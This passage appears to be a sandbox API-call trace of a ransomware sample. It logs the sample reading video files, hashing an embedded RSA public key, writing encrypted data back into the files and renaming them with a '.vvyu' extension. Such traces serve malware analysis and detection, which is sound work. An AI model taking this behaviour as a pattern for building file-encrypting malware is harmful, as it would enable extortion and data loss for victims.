HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aea1d0 | out: hHeap=0x2c0000) returned 1 [0196.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0196.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0196.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0196.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0196.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0196.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0196.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0196.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0196.265] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x1141e, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x1141e, lpOverlapped=0x0) returned 1 [0196.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0196.266] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x11423, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.266] WriteFile (in: hFile=0x584, lpBuffer=0x2ae01d0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae01d0*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0196.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0196.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0196.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0196.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0196.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0196.267] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0196.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0196.268] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.268] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0196.268] CloseHandle (hObject=0x584) returned 1 [0196.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0196.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af3f88 [0196.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0196.271] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\3Ad0c.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\3ad0c.mkv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\3Ad0c.mkv.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\3ad0c.mkv.vvyu")) returned 1 [0196.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0196.273] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x345758 | out: hHeap=0x2c0000) returned 1 [0196.277] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8844a150, ftCreationTime.dwHighDateTime=0x1d8a724, ftLastAccessTime.dwLowDateTime=0xd13cc310, ftLastAccessTime.dwHighDateTime=0x1d8a742, ftLastWriteTime.dwLowDateTime=0xd13cc310, ftLastWriteTime.dwHighDateTime=0x1d8a742, nFileSizeHigh=0x0, nFileSizeLow=0xf583, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aEjMZwA.avi", cAlternateFileName="")) returned 1 [0196.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x345758 [0196.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.277] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\aEjMZwA.avi") returned=".avi" [0196.278] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\aEjMZwA.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\aejmzwa.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0196.279] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=62851) returned 1 [0196.279] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0196.282] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xf55d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.282] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0196.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0196.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0196.285] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.285] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0xf583, lpOverlapped=0x0) returned 1 [0196.286] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0196.286] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.286] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.286] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0196.287] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0196.287] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0196.287] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0196.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0196.287] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0196.287] GetLastError () returned 0x0 [0196.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0196.288] GetLastError () returned 0x0 [0196.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0196.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0196.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0196.288] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0196.288] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0196.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0196.289] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0196.289] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0196.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0196.289] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0196.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0196.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0196.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xf580) returned 0x2af5168 [0196.290] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0196.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0196.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0196.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0196.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0196.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea1d0 [0196.291] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6578 [0196.291] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea218 [0196.291] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6590 [0196.291] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae65c0 [0196.291] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6620 [0196.291] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae65d8 [0196.291] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0196.291] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0196.291] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0196.291] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0196.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65c0 | out: hHeap=0x2c0000) returned 1 [0196.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65d8 | out: hHeap=0x2c0000) returned 1 [0196.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6620 | out: hHeap=0x2c0000) returned 1 [0196.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0196.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0196.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6620 [0196.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0196.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae65d8 [0196.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0196.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae65c0 [0196.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0196.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0196.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0196.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0196.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0196.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0196.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0196.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0196.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65d8 | out: hHeap=0x2c0000) returned 1 [0196.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0196.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65c0 | out: hHeap=0x2c0000) returned 1 [0196.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0196.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0196.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6620 | out: hHeap=0x2c0000) returned 1 [0196.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0196.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0196.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0196.294] GetCurrentThreadId () returned 0x5d8 [0196.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0196.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae8bf8 [0196.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0196.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0196.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0196.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0196.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0196.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0196.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.295] GetCurrentThreadId () returned 0x5d8 [0196.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0196.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0196.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0196.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40478 [0196.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0196.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0196.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0196.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6620 [0196.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0196.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0196.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0196.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0196.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0196.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0196.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0196.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0196.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae65c0 [0196.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0196.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0196.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0196.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0196.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0196.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0196.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0196.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae65d8 [0196.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0196.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0196.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0196.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae65a8 [0196.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0196.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6638 [0196.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0196.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0196.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0196.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6608 [0196.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0196.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae65f0 [0196.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0196.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6650 [0196.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65f0 | out: hHeap=0x2c0000) returned 1 [0196.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae65f0 [0196.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6608 | out: hHeap=0x2c0000) returned 1 [0196.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0196.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0196.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0196.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0196.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0196.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65c0 | out: hHeap=0x2c0000) returned 1 [0196.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae65c0 [0196.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0196.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0196.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6620 | out: hHeap=0x2c0000) returned 1 [0196.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0196.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6650 | out: hHeap=0x2c0000) returned 1 [0196.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0196.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0196.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0196.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0196.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0196.299] 